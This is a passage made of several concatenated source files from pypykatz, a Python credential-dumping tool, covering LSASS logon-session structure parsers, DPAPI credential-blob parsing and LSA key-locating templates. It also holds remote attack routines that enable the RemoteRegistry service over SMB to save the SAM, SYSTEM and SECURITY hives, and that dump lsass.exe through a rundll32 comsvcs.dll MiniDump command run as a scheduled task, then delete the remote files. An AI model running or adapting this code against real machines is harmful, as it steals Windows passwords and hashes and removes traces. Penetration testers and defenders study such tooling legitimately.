		self.Credentials_list_ptr = None
		self.unk19 = None
		self.unk20 = None
		self.unk21 = None
		self.unk22 = None
		self.unk23 = None
		self.unk24 = None
		self.unk25 = None
		self.unk26 = None
		self.unk27 = None
		self.unk28 = None
		self.unk29 = None
		self.CredentialManager = None
	
	@staticmethod
	async def load(reader):
		res = KIWI_MSV1_0_LIST_62()
		res.Flink = await PKIWI_MSV1_0_LIST_62.load(reader)
		res.Blink = await PKIWI_MSV1_0_LIST_62.load(reader)
		res.unk0 = await PVOID.loadvalue(reader)
		res.unk1 = await ULONG.loadvalue(reader)
		await reader.align()
		res.unk2 = await PVOID.loadvalue(reader)
		res.unk3 = await ULONG.loadvalue(reader)
		res.unk4 = await ULONG.loadvalue(reader)
		res.unk5 = await ULONG.loadvalue(reader)
		await reader.align()
		res.hSemaphore6 = await HANDLE.loadvalue(reader)
		res.unk7 = await PVOID.loadvalue(reader)
		res.hSemaphore8 = await HANDLE.loadvalue(reader)
		res.unk9 = await PVOID.loadvalue(reader)
		res.unk10 = await PVOID.loadvalue(reader)
		res.unk11 = await ULONG.loadvalue(reader)
		res.unk12 = await ULONG.loadvalue(reader)
		res.unk13 = await PVOID.loadvalue(reader)
		res.LocallyUniqueIdentifier = await LUID.loadvalue(reader)
		res.SecondaryLocallyUniqueIdentifier = await LUID.loadvalue(reader)
		res.UserName = await LSA_UNICODE_STRING.load(reader)
		res.Domaine = await LSA_UNICODE_STRING.load(reader)
		res.unk14 = await PVOID.loadvalue(reader)
		res.unk15 = await PVOID.loadvalue(reader)
		res.Type = await LSA_UNICODE_STRING.load(reader)
		res.pSid = await PSID.load(reader)
		res.LogonType = await ULONG.loadvalue(reader)
		await reader.align()
		res.unk18 = await PVOID.loadvalue(reader)
		res.Session = await ULONG.loadvalue(reader)
		await reader.align()
		t = await reader.read(8)
		res.LogonTime = int.from_bytes(t, byteorder = 'little', signed = False) #autoalign x86
		res.LogonServer = await LSA_UNICODE_STRING.load(reader)
		res.Credentials_list_ptr = await PKIWI_MSV1_0_CREDENTIAL_LIST.load(reader)
		res.unk19 = await PVOID.loadvalue(reader)
		res.unk20 = await PVOID.loadvalue(reader)
		res.unk21 = await PVOID.loadvalue(reader)
		res.unk22 = await ULONG.loadvalue(reader)
		res.unk23 = await ULONG.loadvalue(reader)
		res.unk24 = await ULONG.loadvalue(reader)
		res.unk25 = await ULONG.loadvalue(reader)
		res.unk26 = await ULONG.loadvalue(reader)
		await reader.align()
		res.unk27 = await PVOID.loadvalue(reader)
		res.unk28 = await PVOID.loadvalue(reader)
		res.unk29 = await PVOID.loadvalue(reader)
		res.CredentialManager = await PVOID.load(reader)
		return res
		
class PKIWI_MSV1_0_LIST_63(POINTER):
	def __init__(self):
		super().__init__()
	
	@staticmethod
	async def load(reader):
		p = PKIWI_MSV1_0_LIST_63()
		p.location = reader.tell()
		p.value = await reader.read_uint()
		p.finaltype = KIWI_MSV1_0_LIST_63
		return p
		
class KIWI_MSV1_0_LIST_63:
	def __init__(self):
		self.Flink = None
		self.Blink = None
		self.unk0 = None
		self.unk1 = None
		self.unk2 = None
		self.unk3 = None
		self.unk4 = None
		self.unk5 = None
		self.hSemaphore6 = None
		self.unk7 = None
		self.hSemaphore8 = None
		self.unk9  = None
		self.unk10 = None
		self.unk11 = None
		self.unk12 = None
		self.unk13 = None
		self.LocallyUniqueIdentifier = None
		self.SecondaryLocallyUniqueIdentifier = None
		self.waza = None
		self.UserName = None
		self.Domaine = None
		self.unk14 = None
		self.unk15 = None
		self.Type = None
		self.pSid = None
		self.LogonType = None
		self.unk18 = None
		self.Session = None
		self.LogonTime =  None
		self.LogonServer = None
		self.Credentials_list_ptr = None
		self.unk19 = None
		self.unk20 = None
		self.unk21 = None
		self.unk22 = None
		self.unk23 = None
		self.unk24 = None
		self.unk25 = None
		self.unk26 = None
		self.unk27 = None
		self.unk28 = None
		self.unk29 = None
		self.CredentialManager = None

	@staticmethod
	async def load(reader):
		res = KIWI_MSV1_0_LIST_63()
		res.Flink = await PKIWI_MSV1_0_LIST_63.load(reader)
		res.Blink = await PKIWI_MSV1_0_LIST_63.load(reader)
		res.unk0 = await PVOID.loadvalue(reader)
		res.unk1 = await ULONG.loadvalue(reader)
		await reader.align()
		res.unk2 = await PVOID.loadvalue(reader)
		res.unk3 = await ULONG.loadvalue(reader)
		res.unk4 = await ULONG.loadvalue(reader)
		res.unk5 = await ULONG.loadvalue(reader)
		await reader.align()
		res.hSemaphore6 = await HANDLE.loadvalue(reader)
		res.unk7 = await PVOID.loadvalue(reader)
		res.hSemaphore8 = await HANDLE.loadvalue(reader)
		res.unk9 = await PVOID.loadvalue(reader)
		res.unk10 = await PVOID.loadvalue(reader)
		res.unk11 = await ULONG.loadvalue(reader)
		res.unk12 = await ULONG.loadvalue(reader)
		res.unk13 = await PVOID.loadvalue(reader)
		await reader.align()
		res.LocallyUniqueIdentifier = await LUID.loadvalue(reader)
		res.SecondaryLocallyUniqueIdentifier = await LUID.loadvalue(reader)
		res.waza = await reader.read(12)
		await reader.align()
		res.UserName = await LSA_UNICODE_STRING.load(reader)
		res.Domaine = await LSA_UNICODE_STRING.load(reader)
		res.unk14 = await PVOID.loadvalue(reader)
		res.unk15 = await PVOID.loadvalue(reader)
		res.Type = await LSA_UNICODE_STRING.load(reader)
		res.pSid = await PSID.load(reader)
		res.LogonType = await ULONG.loadvalue(reader)
		await reader.align()
		res.unk18 = await PVOID.loadvalue(reader)
		res.Session = await ULONG.loadvalue(reader)
		await reader.align(8)
		t = await reader.read(8)
		res.LogonTime =  int.from_bytes(t, byteorder = 'little', signed = False) #autoalign x86
		res.LogonServer = await LSA_UNICODE_STRING.load(reader)
		res.Credentials_list_ptr = await PKIWI_MSV1_0_CREDENTIAL_LIST.load(reader)
		res.unk19 = await PVOID.loadvalue(reader)
		res.unk20 = await PVOID.loadvalue(reader)
		res.unk21 = await PVOID.loadvalue(reader)
		res.unk22 = await ULONG.loadvalue(reader)
		res.unk23 = await ULONG.loadvalue(reader)
		res.unk24 = await ULONG.loadvalue(reader)
		res.unk25 = await ULONG.loadvalue(reader)
		res.unk26 = await ULONG.loadvalue(reader)
		await reader.align()
		#input('CredentialManager\n' + hexdump(reader.peek(0x100)))
		res.unk27 = await PVOID.loadvalue(reader)
		res.unk28 = await PVOID.loadvalue(reader)
		res.unk29 = await PVOID.loadvalue(reader)
		res.CredentialManager = await PVOID.load(reader)
		return res



import asyncio
import os

from pypykatz import logging

async def regdump(url, hives = ['HKLM\\SAM', 'HKLM\\SYSTEM', 'HKLM\\SECURITY'], remote_base_path = 'C:\\Windows\\Temp\\', remote_share_name = '\\c$\\Windows\\Temp\\', enable_wait = 3):
	from aiosmb.commons.connection.url import SMBConnectionURL
	from aiosmb.commons.interfaces.machine import SMBMachine
	from aiosmb.commons.interfaces.file import SMBFile
	from aiosmb.dcerpc.v5.common.service import SMBServiceStatus
	from pypykatz.alsadecryptor.asbmfile import SMBFileReader
	from pypykatz.registry.aoffline_parser import OffineRegistry

	

	smburl = SMBConnectionURL(url)
	connection = smburl.get_connection()
	if remote_base_path.endswith('\\') is False:
		remote_base_path += '\\'

	if remote_share_name.endswith('\\') is False:
		remote_share_name += '\\'

	po = None

	async with connection:
		logging.debug('[REGDUMP] Connecting to server...')
		_, err = await connection.login()
		if err is not None:
			raise err
		
		logging.debug('[REGDUMP] Connected to server!')
		async with SMBMachine(connection) as machine:
			logging.debug('[REGDUMP] Checking remote registry service status...')
			status, err = await machine.check_service_status('RemoteRegistry')
			if err is not None:
				raise err
			
			logging.debug('[REGDUMP] Remote registry service status: %s' % status.name)
			if status != SMBServiceStatus.RUNNING:
				logging.debug('[REGDUMP] Enabling Remote registry service')
				_, err = await machine.enable_service('RemoteRegistry')
				if err is not None:
					raise err
				logging.debug('[REGDUMP] Starting Remote registry service')
				_, err = await machine.start_service('RemoteRegistry')
				if err is not None:
					raise err

				await asyncio.sleep(enable_wait)

			
			
			logging.debug('[REGDUMP] Remote registry service should be running now...')
			files = {}
			for hive in hives:
				fname = '%s.%s' % (os.urandom(4).hex(), os.urandom(3).hex())
				remote_path = remote_base_path + fname
				remote_sharepath = remote_share_name + fname
				remote_file = SMBFileReader(SMBFile.from_remotepath(connection, remote_sharepath))
				files[hive.split('\\')[1].upper()] = remote_file
				
				logging.debug('[REGDUMP] Dumping reghive %s to (remote) %s' % (hive, remote_path))
				_, err = await machine.save_registry_hive(hive, remote_path)
				if err is not None:
					raise err
			
			#await asyncio.sleep(1)
			for rfilename in files:
				rfile = files[rfilename]
				logging.debug('[REGDUMP] Opening reghive file %s' % rfilename)
				_, err = await rfile.open(connection)
				if err is not None:
					raise err
			
			try:
				logging.debug('[REGDUMP] Parsing hives...')
				po = await OffineRegistry.from_async_reader(
					files['SYSTEM'], 
					sam_reader = files.get('SAM'), 
					security_reader = files.get('SECURITY'), 
					software_reader = files.get('SOFTWARE')
				)
			except Exception as e:
				print(e)
			
			logging.debug('[REGDUMP] Hives parsed OK!')
			
			logging.debug('[REGDUMP] Deleting remote files...')
			err = None
			for rfilename in files:
				rfile = files[rfilename]
				err = await rfile.close()
				if err is not None:
					logging.debug('[REGDUMP] ERR! Failed to close hive dump file! %s' % rfilename)

				_, err = await rfile.delete()
				if err is not None:
					logging.debug('[REGDUMP] ERR! Failed to delete hive dump file! %s' % rfilename)
			
			if err is None:
				logging.debug('[REGDUMP] Deleting remote files OK!')
	return po

			

async def regfile(url, system, sam = None, security = None, software = None, smb_basepath = None):
	from aiosmb.commons.connection.url import SMBConnectionURL
	from aiosmb.commons.interfaces.file import SMBFile
	from pypykatz.alsadecryptor.asbmfile import SMBFileReader
	from pypykatz.registry.aoffline_parser import OffineRegistry

	smburl = SMBConnectionURL(url)
	connection = smburl.get_connection()

	if smb_basepath is None:
		smb_basepath = smburl.path
	if smb_basepath.endswith('/') is False:
		smb_basepath += '/'
	smb_basepath = smb_basepath.replace('/', '\\')
			
	system_smbfile_path = smb_basepath + system
	sam_smbfile = None
	security_smbfile = None
	software_smbfile = None


	system_smbfile = SMBFileReader(SMBFile.from_remotepath(connection, system_smbfile_path))

	if sam:
		sam_smbfile_path = smb_basepath + sam
		sam_smbfile = SMBFileReader(SMBFile.from_remotepath(connection, sam_smbfile_path))
			
	if security:
		security_smbfile_path = smb_basepath + security
		security_smbfile = SMBFileReader(SMBFile.from_remotepath(connection, security_smbfile_path))
			
	if software:
		software_smbfile_path = smb_basepath + software
		software_smbfile = SMBFileReader(SMBFile.from_remotepath(connection, software_smbfile_path))

	po = None
	async with connection:
		logging.debug('[REGFILE] Connecting to server...')
		_, err = await connection.login()
		if err is not None:
			raise err
		
		logging.debug('[REGFILE] Connected to server!')
		logging.debug('[REGFILE] Opening SYSTEM hive dump file...')
		# parse files here
		_, err = await system_smbfile.open(connection)
		if err is not None:
			raise err

		if sam_smbfile is not None:
			logging.debug('[REGFILE] Opening SAM hive dump file...')
			_, err = await sam_smbfile.open(connection)
			if err is not None:
				raise err
				
		if security_smbfile is not None:
			logging.debug('[REGFILE] Opening SECURITY hive dump file...')
			_, err = await security_smbfile.open(connection)
			if err is not None:
				raise err
				
		if software_smbfile is not None:
			logging.debug('[REGFILE] Opening SOFTWARE hive dump file...')
			_, err = await software_smbfile.open(connection)
			if err is not None:
				raise err
		
		logging.debug('[REGFILE] All files opened OK!')
		logging.debug('[REGFILE] Parsing hive files...')
		po = await OffineRegistry.from_async_reader(system_smbfile, sam_reader = sam_smbfile, security_reader = security_smbfile, software_reader = software_smbfile)
		logging.debug('[REGFILE] Hive files parsed OK!')

	return po


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#

import io
import enum

from pypykatz.dpapi.structures.blob import DPAPI_BLOB

class CredentialFile:
	"""
	"""
	def __init__(self):
		self.version = None
		self.size = None
		self.unk = None
		self.data = None
		
		#not in the spec
		self.blob = None
		
	@staticmethod
	def from_bytes(data):
		return CredentialFile.from_buffer(io.BytesIO(data))

	@staticmethod
	def from_buffer(buff):
		sk = CredentialFile()
		sk.version = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.size = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.unk = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.data = buff.read(sk.size)
		sk.blob = DPAPI_BLOB.from_bytes(sk.data)
		return sk
		
	def __str__(self):
		t = '== CredentialFile ==\r\n'
		for k in self.__dict__:
			if isinstance(self.__dict__[k], list):
				for i, item in enumerate(self.__dict__[k]):
					t += '   %s: %s: %s' % (k, i, str(item))
			else:
				t += '%s: %s \r\n' % (k, str(self.__dict__[k]))
		return t
		
class CREDENTIAL_ATTRIBUTE:
	"""
	"""
	def __init__(self):
		self.flags = None
		self.keyword_length = None
		self.keyword = None
		self.data_length = None
		self.data = None
		
	@staticmethod
	def from_bytes(data):
		return CREDENTIAL_ATTRIBUTE.from_buffer(io.BytesIO(data))

	@staticmethod
	def from_buffer(buff):
		sk = CREDENTIAL_ATTRIBUTE()		
		sk.flags = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.keyword_length = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.keyword = buff.read(sk.keyword_length)
		try:
			sk.keyword = sk.keyword.decode('utf-16-le')
		except:
			pass
		sk.data_length = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.data = buff.read(sk.data_length)
		return sk
		
	def to_text(self):
		t = ''
		if len(self.keyword) > 0:
			t += 'keyword: %s\r\n' % str(self.keyword)
		if len(self.data) > 0:
			t += 'data: %s\r\n' % str(self.data)
		return t
		
	def __str__(self):
		t = '== CREDENTIAL_ATTRIBUTE ==\r\n'
		for k in self.__dict__:
			if isinstance(self.__dict__[k], list):
				for i, item in enumerate(self.__dict__[k]):
					t += '   %s: %s: %s' % (k, i, str(item))
			else:
				t += '%s: %s \r\n' % (k, str(self.__dict__[k]))
		return t
		
		
class CREDENTIAL_BLOB:
	"""
	"""
	def __init__(self):
		self.flags = None
		self.size = None
		self.unk0 = None
		self.type = None
		self.flags2 = None
		self.last_written = None
		self.unk1 = None
		self.persist = None
		self.attributes_count = None
		self.unk2 = None
		self.target_length = None
		self.target = None
		self.target_alias_length = None
		self.target_alias = None
		self.description_length = None
		self.description = None
		self.unknown3_length = None
		self.unknown3 = None
		self.username_length = None
		self.username = None
		self.unknown4_length = None
		self.unknown4 = None
		
		self.attributes = []
		
		
		
	@staticmethod
	def from_bytes(data):
		return CREDENTIAL_BLOB.from_buffer(io.BytesIO(data))

	@staticmethod
	def from_buffer(buff):
		sk = CREDENTIAL_BLOB()		
		sk.flags = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.size = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.unk0 = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.type = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.flags2 = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.last_written = int.from_bytes(buff.read(8), 'little', signed = False)
		sk.unk1 = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.persist = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.attributes_count = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.unk2 = int.from_bytes(buff.read(8), 'little', signed = False)
		sk.target_length = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.target = buff.read(sk.target_length)
		if sk.target_length > 0:
			try:
				sk.target = sk.target.decode('utf-16-le')
			except:
				pass
		sk.target_alias_length = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.target_alias = buff.read(sk.target_alias_length)
		if sk.target_alias_length > 0:
			try:
				sk.target_alias = sk.target_alias.decode('utf-16-le')
			except:
				pass
		sk.description_length = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.description = buff.read(sk.description_length)
		if sk.description_length > 0:
			try:
				sk.description = sk.description.decode('utf-16-le')
			except:
				pass
		sk.unknown3_length = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.unknown3 = buff.read(sk.unknown3_length)
		sk.username_length = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.username = buff.read(sk.username_length)
		if sk.username_length > 0:
			try:
				sk.username = sk.username.decode('utf-16-le')
			except:
				pass
		sk.unknown4_length = int.from_bytes(buff.read(4), 'little', signed = False)
		sk.unknown4 = buff.read(sk.unknown4_length)
		
		for _ in range(sk.attributes_count):
			attr = CREDENTIAL_ATTRIBUTE.from_buffer(buff)
			sk.attributes.append(attr)
		
		return sk
		
	def to_text(self):	
		t = ''
		t += 'last_written : %s\r\n' %  self.last_written
		if len(self.target) > 0:
			t += 'target : %s\r\n' %  str(self.target)
		if len(self.target_alias) > 0:
			t += 'target_alias : %s\r\n' %  str(self.target_alias)
		if len(self.description) > 0:
			t += 'description : %s\r\n' %  str(self.description)
		if len(self.unknown3) > 0:
			t += 'unknown3 : %s\r\n' %  str(self.unknown3)
		if len(self.username) > 0:
			t += 'username : %s\r\n' %  str(self.username)
		if len(self.unknown4) > 0:
			t += 'unknown4 : %s\r\n' %  str(self.unknown4)
		for attr in self.attributes:
			t += 'ATTRIBUTE\r\n'
			t += attr.to_text()
		return t
		
	def __str__(self):
		t = '== CREDENTIAL_BLOB ==\r\n'
		for k in self.__dict__:
			if isinstance(self.__dict__[k], list):
				for i, item in enumerate(self.__dict__[k]):
					t += '   %s: %s: %s' % (k, i, str(item))
			else:
				t += '%s: %s \r\n' % (k, str(self.__dict__[k]))
		return t
		



import asyncio
import os

from pypykatz import logging

async def lsassfile(url):
	from aiosmb.commons.connection.url import SMBConnectionURL
	from pypykatz.alsadecryptor.asbmfile import SMBFileReader
	from pypykatz.apypykatz import apypykatz

	smburl = SMBConnectionURL(url)
	connection = smburl.get_connection()
	smbfile = smburl.get_file()

	async with connection:
		logging.debug('[LSASSFILE] Connecting to server...')
		_, err = await connection.login()
		if err is not None:
			raise err
		
		logging.debug('[LSASSFILE] Connected!')
		logging.debug('[LSASSFILE] Opening LSASS dump file...')
		_, err = await smbfile.open(connection)
		if err is not None:
			raise err
		
		logging.debug('[LSASSFILE] LSASS file opened!')
		logging.debug('[LSASSFILE] parsing LSASS file...')
		mimi = await apypykatz.parse_minidump_external(SMBFileReader(smbfile))
		logging.debug('[LSASSFILE] LSASS file parsed OK!')
		return mimi

async def lsassdump(url, method = 'taskexec', remote_base_path = 'C:\\Windows\\Temp\\', remote_share_name = '\\c$\\Windows\\Temp\\',):
	from aiosmb.commons.connection.url import SMBConnectionURL
	from aiosmb.commons.interfaces.machine import SMBMachine
	from pypykatz.alsadecryptor.asbmfile import SMBFileReader
	from aiosmb.commons.interfaces.file import SMBFile
	from pypykatz.apypykatz import apypykatz

	smburl = SMBConnectionURL(url)
	connection = smburl.get_connection()

	if remote_base_path.endswith('\\') is False:
		remote_base_path += '\\'

	if remote_share_name.endswith('\\') is False:
		remote_share_name += '\\'

	fname = '%s.%s' % (os.urandom(5).hex(), os.urandom(3).hex())
	filepath = remote_base_path + fname
	filesharepath = remote_share_name + fname
	
	if method == 'taskexec':
		cmd = """for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump ^%B {} full""".format(filepath)
		commands = [cmd]
	
	else:
		raise Exception('Unknown execution method %s' % method)

	mimi = None
	async with connection:
		logging.debug('[LSASSDUMP] Connecting to server...')
		_, err = await connection.login()
		if err is not None:
			raise err
		logging.debug('[LSASSDUMP] Connected!')
		async with SMBMachine(connection) as machine:
			if method == 'taskexec':
				logging.debug('[LSASSDUMP] Start dumping LSASS with taskexec method!')
				_, err = await machine.tasks_execute_commands(commands)
				if err is not None:
					raise err
				
				logging.debug('[LSASSDUMP] Sleeping a bit to let the remote host finish dumping')
				await asyncio.sleep(10)
			
			else:
				raise Exception('Unknown execution method %s' % method)
		
		logging.debug('[LSASSDUMP] Opening LSASS dump file...')
		smbfile = SMBFileReader(SMBFile.from_remotepath(connection, filesharepath))
		_, err = await smbfile.open(connection)
		if err is not None:
			raise err
		
		logging.debug('[LSASSDUMP] LSASS dump file opened!')
		logging.debug('[LSASSDUMP] parsing LSASS dump file on the remote host...')
		mimi = await apypykatz.parse_minidump_external(smbfile)

		logging.debug('[LSASSDUMP] parsing OK!')
		logging.debug('[LSASSDUMP] Deleting remote dump file...')
		_, err = await smbfile.delete()
		if err is not None:
			raise err
		logging.debug('[LSASSDUMP] remote LSASS file deleted OK!')


	return mimi


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#


from minidump.win_datatypes import ULONG, PVOID, POINTER
from pypykatz.commons.common import KatzSystemArchitecture, WindowsMinBuild, WindowsBuild
from pypykatz.lsadecryptor.package_commons import PackageTemplate

class LsaTemplate_NT6(PackageTemplate):
	def __init__(self):
		super().__init__('LSA Decryptor')
		self.key_pattern = None
		self.key_handle_struct = None
		self.key_struct = None
		self.hard_key_struct = KIWI_HARD_KEY
		self.nt_major = '6'


	@staticmethod
	def get_template_brute(sysinfo):
		if sysinfo.architecture == KatzSystemArchitecture.X86:
			if sysinfo.buildnumber <= WindowsMinBuild.WIN_XP.value:
				raise Exception('NT 5 is not yet supported!')
			elif sysinfo.buildnumber <= WindowsMinBuild.WIN_2K3.value:
				raise Exception('NT 5 is not yet supported!')
			else:
				for key in templates['nt6']['x86']:
					yield templates['nt6']['x86'][key]

		elif sysinfo.architecture == KatzSystemArchitecture.X64:
			if sysinfo.buildnumber <= WindowsMinBuild.WIN_XP.value:
				raise Exception('NT 5 is not yet supported!')
			elif sysinfo.buildnumber <= WindowsMinBuild.WIN_2K3.value:
				raise Exception('NT 5 is not yet supported!')
			else:
				for key in templates['nt6']['x64']:
					yield templates['nt6']['x64'][key]
		
		
	@staticmethod
	def get_template(sysinfo):
		template = LsaTemplate_NT6()
		
		if sysinfo.architecture == KatzSystemArchitecture.X86:
			if sysinfo.buildnumber <= WindowsMinBuild.WIN_XP.value:
				raise Exception("Maybe implemented later")
			
			elif sysinfo.buildnumber <= WindowsMinBuild.WIN_2K3.value:
				template.nt_major = '5'
				template = templates['nt5']['x86']['1']
				
			elif WindowsMinBuild.WIN_VISTA.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_7.value:
				#1
				template = templates['nt6']['x86']['1']
				#key_pattern = LSADecyptorKeyPattern()
				#key_pattern.signature = b'\x6a\x02\x6a\x10\x68'
				#key_pattern.IV_length = 16
				#key_pattern.offset_to_IV_ptr = 5
				#key_pattern.offset_to_DES_key_ptr = -76
				#key_pattern.offset_to_AES_key_ptr = -21
				#
				#template.key_pattern = key_pattern
				#template.key_struct = KIWI_BCRYPT_KEY
				#template.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY
				
			elif WindowsMinBuild.WIN_7.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_8.value:
				#2
				template = templates['nt6']['x86']['2']
				#key_pattern = LSADecyptorKeyPattern()
				#key_pattern.signature = b'\x6a\x02\x6a\x10\x68'
				#key_pattern.IV_length = 16
				#key_pattern.offset_to_IV_ptr = 5
				#key_pattern.offset_to_DES_key_ptr = -76
				#key_pattern.offset_to_AES_key_ptr = -21
				#
				#template.key_pattern = key_pattern
				#template.key_struct = KIWI_BCRYPT_KEY
				#template.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY
				
			elif WindowsMinBuild.WIN_8.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_BLUE.value:
				#3
				template = templates['nt6']['x86']['3']
				#key_pattern = LSADecyptorKeyPattern()
				#key_pattern.signature = b'\x6a\x02\x6a\x10\x68'
				#key_pattern.IV_length = 16
				#key_pattern.offset_to_IV_ptr = 5
				#key_pattern.offset_to_DES_key_ptr = -69
				#key_pattern.offset_to_AES_key_ptr = -18
				#
				#template.key_pattern = key_pattern
				#template.key_struct = KIWI_BCRYPT_KEY8
				#template.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY
				
			elif WindowsMinBuild.WIN_BLUE.value <= sysinfo.buildnumber < WindowsMinBuild.WIN_10.value:
				#4
				template = templates['nt6']['x86']['4']
				#key_pattern = LSADecyptorKeyPattern()
				#key_pattern.signature = b'\x6a\x02\x6a\x10\x68'
				#key_pattern.IV_length = 16
				#key_pattern.offset_to_IV_ptr = 5
				#
				#key_pattern.offset_to_DES_key_ptr = -69
				#key_pattern.offset_to_AES_key_ptr = -18
				#
				#template.key_pattern = key_pattern
				#template.key_struct = KIWI_BCRYPT_KEY81
				#template.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY
				
			elif WindowsMinBuild.WIN_10.value <= sysinfo.buildnumber <= WindowsBuild.WIN_10_1507.value:
				#5
				template = templates['nt6']['x86']['5']

				#key_pattern = LSADecyptorKeyPattern()
				#key_pattern.signature = b'\x6a\x02\x6a\x10\x68'
				#key_pattern.IV_length = 16
				#key_pattern.offset_to_IV_ptr = 5
				#key_pattern.offset_to_DES_key_ptr = -79
				#key_pattern.offset_to_AES_key_ptr = -22
				#
				#template.key_pattern = key_pattern
				#template.key_struct = KIWI_BCRYPT_KEY81
				#template.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY
				
				
			elif sysinfo.buildnumber > WindowsBuild.WIN_10_1507.value:
				#6
				template = templates['nt6']['x86']['6']
				#key_pattern = LSADecyptorKeyPattern()
				#key_pattern.signature = b'\x6a\x02\x6a\x10\x68'
				#key_pattern.IV_length = 16
				#key_pattern.offset_to_IV_ptr = 5
				#key_pattern.offset_to_DES_key_ptr = -79
				#key_pattern.offset_to_AES_key_ptr = -22
				#
				#template.key_pattern = key_pattern
				#template.key_struct = KIWI_BCRYPT_KEY81
				#template.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY
		
		elif sysinfo.architecture == KatzSystemArchitecture.X64:
		
			if sysinfo.buildnumber <= WindowsMinBuild.WIN_XP.value:
				raise Exception("Maybe implemented later")
			
			elif sysinfo.buildnumber <= WindowsMinBuild.WIN_2K3.value:
				raise Exception("Maybe implemented later")
			
			elif sysinfo.buildnumber < WindowsMinBuild.WIN_7.value:
				#vista
				#1
				template = templates['nt6']['x64']['1']
				#key_pattern = LSADecyptorKeyPattern()
				#key_pattern.signature = b'\x83\x64\x24\x30\x00\x44\x8b\x4c\x24\x48\x48\x8b\x0d'
				#key_pattern.IV_length = 16
				#key_pattern.offset_to_IV_ptr = 63
				#key_pattern.offset_to_DES_key_ptr = -69
				#key_pattern.offset_to_AES_key_ptr = 25
				#
				#template.key_pattern = key_pattern
				#template.key_struct = KIWI_BCRYPT_KEY
				#template.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY
		
			elif sysinfo.buildnumber < WindowsMinBuild.WIN_8.value:
				#win 7
				#2
				template = templates['nt6']['x64']['2']

				#key_pattern = LSADecyptorKeyPattern()
				#key_pattern.signature = b'\x83\x64\x24\x30\x00\x44\x8b\x4c\x24\x48\x48\x8b\x0d'
				#key_pattern.IV_length = 16
				#key_pattern.offset_to_IV_ptr = 59
				#key_pattern.offset_to_DES_key_ptr = -61
				#key_pattern.offset_to_AES_key_ptr = 25
				#
				#template.key_pattern = key_pattern
				#template.key_struct = KIWI_BCRYPT_KEY
				#template.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY
			
			elif sysinfo.buildnumber < WindowsMinBuild.WIN_10.value:
				#win 8 and blue
				#3
				#key_pattern = LSADecyptorKeyPattern()
				#key_pattern.signature = b'\x83\x64\x24\x30\x00\x44\x8b\x4d\xd8\x48\x8b\x0d'
				#key_pattern.IV_length = 16
				#key_pattern.offset_to_IV_ptr = 62
				#key_pattern.offset_to_DES_key_ptr = -70
				#key_pattern.offset_to_AES_key_ptr = 23
				
				if sysinfo.buildnumber < WindowsMinBuild.WIN_BLUE.value:
					template = templates['nt6']['x64']['3']
					#win8
					#3
					#template.key_pattern = key_pattern
					#template.key_struct = KIWI_BCRYPT_KEY8
					#template.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY
				
				else:
					template = templates['nt6']['x64']['4']
					#4
					#win blue
					#template.key_pattern = key_pattern
					#template.key_struct = KIWI_BCRYPT_KEY81
					#template.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY
			
			
			elif sysinfo.buildnumber < WindowsBuild.WIN_10_1809.value:
				template = templates['nt6']['x64']['5']
				#5
				#key_pattern = LSADecyptorKeyPattern()
				#key_pattern.signature = b'\x83\x64\x24\x30\x00\x48\x8d\x45\xe0\x44\x8b\x4d\xd8\x48\x8d\x15'
				#key_pattern.IV_length = 16
				#key_pattern.offset_to_IV_ptr = 61
				#key_pattern.offset_to_DES_key_ptr = -73
				#key_pattern.offset_to_AES_key_ptr = 16
				#
				#template.key_pattern = key_pattern
				#template.key_struct = KIWI_BCRYPT_KEY81
				#template.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY				
				
				
			#elif sysinfo.buildnumber <= WindowsBuild.WIN_10_1809.value:
			else:
				template = templates['nt6']['x64']['6']
				#1809
				#6
				#key_pattern = LSADecyptorKeyPattern()
				#key_pattern.signature = b'\x83\x64\x24\x30\x00\x48\x8d\x45\xe0\x44\x8b\x4d\xd8\x48\x8d\x15'
				#key_pattern.IV_length = 16
				#key_pattern.offset_to_IV_ptr = 67
				#key_pattern.offset_to_DES_key_ptr = -89
				#key_pattern.offset_to_AES_key_ptr = 16
				#
				#template.key_pattern = key_pattern
				#template.key_struct = KIWI_BCRYPT_KEY81
				#template.key_handle_struct = KIWI_BCRYPT_HANDLE_KEY
			
		else:
			raise Exception('Missing LSA decrpytor template for Architecture: %s , Build number %s' % (sysinfo.architecture, sysinfo.buildnumber))
		

		template.log_template('key_handle_struct', template.key_handle_struct)
		template.log_template('key_struct', template.key_struct)
		template.log_template('hard_key_struct', template.hard_key_struct)
		
		return template
		
		
class LSADecyptorKeyPattern:
	def __init__(self):
